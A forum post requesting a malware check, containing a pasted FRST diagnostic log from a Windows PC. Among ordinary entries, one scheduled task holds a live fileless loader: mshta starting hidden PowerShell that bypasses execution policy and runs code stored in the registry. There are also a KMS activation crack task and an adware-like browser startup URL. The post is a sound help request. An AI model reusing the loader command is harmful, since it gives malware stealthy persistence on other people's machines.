Request for a preventive check
Posted: 23 Oct 2020 09:48
Hello, I would like to ask for a preventive check. The PC runs fine, but the time has come (like at the dentist).
FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-10-2020
Ran by Tomika (administrator) on TOM (Gigabyte Technology Co., Ltd. Z87-HD3) (23-10-2020 10:44:48)
Running from C:\Users\Tomika\Desktop
Loaded Profiles: Tomika
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United Kingdom)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(A FOUR TECH CO., LTD. -> ) C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated -> Adobe Systems Inc.) D:\Programy\Adobe\Acrobat\Acrobat\acrotray.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Autodesk, Inc -> Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Cole Williams Software Limited -> ) C:\Windows\SysWOW64\Codecs\TrayMenu.exe
(CrypKey (Canada) Ltd.) [File not signed] C:\Windows\System32\Crypserv.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <50>
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Pub\PreCare.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\kited.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\KiteService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Oxygen Cloud Inc. -> ) C:\Users\Tomika\.odrive\bin\6729\odriveapp.exe
(Oxygen Cloud Inc. -> odrive) C:\Users\Tomika\.odrive\bin\6729\odrive.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(Stichting Blender Foundation -> Blender Foundation) C:\Program Files\Blender Foundation\Blender 2.90\blender.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) D:\Programy\TeamViewer\TeamViewer_Service.exe
(Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Wondershare software CO., LIMITED -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1893496 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-03-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [711616 2016-04-19] (Autodesk, Inc -> Autodesk, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => D:\Programy\Adobe\Acrobat\Acrobat\Acrotray.exe [3499896 2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [Codec Settings UAC Manager] => C:\Windows\SysWOW64\Codecs\CodecUACManager.exe [66192 2018-03-20] (Cole Williams Software Limited -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [EpicGamesLauncher] => D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32546704 2020-10-23] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [91701608 2020-07-30] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Bloody2] => C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe [19841264 2020-02-13] (A FOUR TECH CO., LTD. -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Kite] => C:\Program Files\Kite\kited.exe [625822184 2020-10-14] (Manhattan Engineering Incorporated -> Kite)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe [2020-10-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2018-06-11]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\Codecs\TrayMenu.exe (Cole Williams Software Limited -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\odrive.lnk [2017-07-27]
ShortcutTarget: odrive.lnk -> C:\Program Files\odrive\odrive.exe (Oxygen Cloud, Inc -> ) [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0291BC3E-5758-4AE0-B583-887997C4F7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {08667DDA-529A-4AE5-B93A-F3FB2AFB6863} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {14E9279D-E202-421D-9345-9FF6FF65892A} - System32\Tasks\AutoKMS => D:\Programy\MS Office\KMS_tooltip_crack\AutoKMS.exe
Task: {19B48E07-EF07-43C1-89F3-DC0C7BE14F95} - System32\Tasks\CCleanerSkipUAC => D:\Programy\CCleaner\CCleaner.exe [26588344 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {240525CC-07E9-4C0E-BF92-7FD8CBC01AAC} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Scheduler.exe [149776 2019-11-14] (IObit Information Technology -> IObit)
Task: {2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97} - \Movie\Movie task -> No File <==== ATTENTION
Task: {2C5BAA6C-22CE-4023-8CD3-920F648F948D} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [436856 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3B6DA161-FF75-4709-9698-E8B4D4E29F7A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {521E2DEE-AF47-458B-BE39-05E41D7000C3} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [1112576 2017-05-19] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.)
Task: {56E7C739-D87C-4968-A298-0FA8DD870A67} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {57E8FD86-D77A-4957-AF8A-185FF714EF38} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {5DFEF0DB-1EC0-4858-9DE9-295F0928B552} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {5FBDD006-E7EF-4EB4-B15F-E75C13219037} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {67CAE894-9940-43DF-A154-A01C69C48B7F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {69904E5D-AA09-4F07-8269-73B550B28214} - System32\Tasks\JavaUpdateSched => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
Task: {7354C34F-FF87-4E86-89AB-F2B6844E5835} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [1693816 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8116AA3D-F35E-4EE1-A65F-61E452CB28B9} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_445_pepper.exe [1497656 2020-10-13] (Adobe Inc. -> Adobe)
Task: {8623AE83-BCCD-4DB0-BE84-45A87C9A0D5E} - System32\Tasks\CCleaner Update => D:\Programy\CCleaner\CCUpdate.exe [686384 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {AF11B0C8-2370-4BF1-A148-2AC2A2B5F4A3} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B669C2DF-0043-43E2-BD6E-2B93975B0C19} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {BBB840E0-DF47-4533-842A-614A9FB55DB2} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {C5600166-0D00-436C-9597-BB2E48267804} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
Task: {D9E3F3C1-96EA-408C-93C5-EAB8CC220326} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E3339F51-E6A0-4320-BFB4-20947A367484} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2643689781-145595849-2857803826-1001 => C:\Users\Tomika\AppData\Local\MEGAsync\MEGAupdater.exe [615160 2019-04-14] (Mega Limited -> Mega Limited)
Task: {E43C15E6-6414-4ACA-846C-D124676E2AD8} - System32\Tasks\Driver Booster SkipUAC (Tomika) => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\DriverBooster.exe [7749904 2019-12-19] (IObit Information Technology -> IObit)
Task: {E83C055E-EA00-442C-83F5-A1DF6B84C917} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\AutoUpdate.exe [2361104 2019-12-18] (IObit Information Technology -> IObit)
Task: {EDF106E5-69AB-49FB-9A36-0AF6F148BFCB} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FA8EF300-7063-437D-9ECE-A3820122D686} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FB2E7073-3061-4C88-848B-30215EF82E06} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [946296 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Tcpip\..\Interfaces\{1F7EB040-CEB2-48F8-A98A-A024DE0DE62A}: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Edge:
======
Edge Profile: C:\Users\Tomika\AppData\Local\Microsoft\Edge\User Data\Default [2020-07-01]
FireFox:
========
FF DefaultProfile: 006jgses.default
FF ProfilePath: C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default [2020-10-21]
FF Session Restore: Mozilla\Firefox\Profiles\006jgses.default -> is enabled.
FF Extension: (AdBlocker Ultimate) - C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default\Extensions\adblockultimate@adblockultimate.net.xpi [2020-10-20]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn [2017-01-04] [Legacy] [not signed]
FF Plugin: @java.com/DTPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\dtplugin\npDeployJava1.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\plugin2\npjp2.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-02-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @wolfram.com/Mathematica -> C:\Program Files (x86)\Common Files\Wolfram Research\Browser\11.0.1.5597552\npmathplugin.dll [2016-09-21] (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FF Plugin-x32: Adobe Acrobat -> D:\Programy\Adobe\Acrobat\Acrobat\Air\nppdf32.dll [2014-08-05] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default [2020-10-23]
CHR Notifications: Default -> hxxps://calendar.google.com; hxxps://web.skype.com; hxxps://www.messenger.com
CHR HomePage: Default -> hxxp://www.seznam.cz/?clid=13415
CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRa0T-NJ1bNV5iGB7j76kR7EOZGkeQkbUBtqSnxy0q4qOqRPdLMQ5814Ip_0Bcs96ceKxOJ3yAx3ac2A20wh1BTmHSKoac3d5DU0PKrFavIAzFxl1cPGixbg440pQsLkCnd8sKH-Ln2Ju87vPmwn5rVbntl2zC3PO29IJVaQ5afAlJNtFeJI,","hxxp://www.google.com/","hxxp://d2ucfwpxlh3zh3 ... mode=loadm"
CHR NewTab: Default -> Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Session Restore: Default -> is enabled.
CHR Extension: (Flash Video Downloader) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2020-10-09]
CHR Extension: (ColorZilla) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2019-04-02]
CHR Extension: (Mendeley Web Importer) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\dagcmkpagjlhakfdhnbomgmjdpkdklff [2020-10-09]
CHR Extension: (Adobe Acrobat) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-09-16]
CHR Extension: (Video Downloader professional) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2020-07-26]
CHR Extension: (News Feed Eradicator for Facebook) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjcldmjmjhkklehbacihaiopjklihlgg [2020-10-21]
CHR Extension: (Vysor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gidgenkbbabolejbgbpnhbimgjbffefm [2020-09-04]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-10-16]
CHR Extension: (Google Kalendář) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmbgaklkmjakoegficnlkhebmhkjfich [2020-06-11]
CHR Extension: (Toby for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hddnkoipeenegfoeaoibdmnaalmgkpip [2020-10-15]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2020-10-23]
CHR Extension: (Google Keep – poznámky a seznamy) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2020-10-23]
CHR Extension: (Obvibase: an online database editor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hoddinokjifhganfcgkjmkkngljebjdj [2020-09-02]
CHR Extension: (WhatFont) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jabopobgcpjmedljpbcaablpmlmfcogm [2019-04-02]
CHR Extension: (Speed Dial 2 New tab) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2020-04-16]
CHR Extension: (Auto Replay for YouTube™) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanbnempkjnhadplbfgdaagijdbdbjeb [2019-11-25]
CHR Extension: (Grammarly for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2020-10-21]
CHR Extension: (Any.do Extension) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2019-04-02]
CHR Extension: (Zoom for Google Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lajondecmobodlejlcjllhojikagldgd [2020-08-14]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2020-10-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Any.do) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocgddccilgpeepgglnlpchkpgamkgmld [2019-04-02]
CHR Extension: (Chrome Media Router) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-08]
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-09]
CHR HKU\S-1-5-21-2643689781-145595849-2857803826-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1262096 2016-04-19] (Autodesk, Inc -> Autodesk Inc.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [83984 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 CrypKey License; C:\Windows\system32\crypserv.exe [126976 2010-03-18] (CrypKey (Canada) Ltd.) [File not signed]
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1636936 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6821960 2020-03-21] (GOG Sp. z o.o. -> GOG.com)
